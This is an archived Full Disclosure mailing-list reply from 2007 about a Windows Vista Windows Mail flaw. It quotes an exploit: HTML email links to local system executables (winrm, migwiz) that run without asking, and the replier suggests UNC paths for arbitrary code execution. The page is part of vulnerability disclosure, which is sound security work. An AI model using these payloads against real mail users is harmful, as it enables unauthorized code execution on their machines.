Full Disclosure mailing list archives
Re: Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability
From: Joxean Koret <joxeankoret () yahoo es>
Date: Fri, 23 Mar 2007 11:15:57 +0100 (CET)
Hi, Did you test it using UNC paths? It may be a way to truly execute arbitrary code. Regards, Joxean Koret
Exploit: Send a HTML email message containing the URL: <a href="c:/windows/system32/winrm?">Click here!</a> or <a href="c:/windows/system32/migwiz?">Click here!</a> and winrm.cmd/migwiz.exe gets executed without asking
for permission. These are just examples. I could not pass arguments to winrm (hehe this would be beautiful), but I guess there are several attack vectors.
______________________________________________ LLama Gratis a cualquier PC del Mundo. Llamadas a fijos y móviles desde 1 céntimo por minuto. http://es.voice.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability Kingcope (Mar 23)
- <Possible follow-ups>
- Re: Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability Joxean Koret (Mar 23)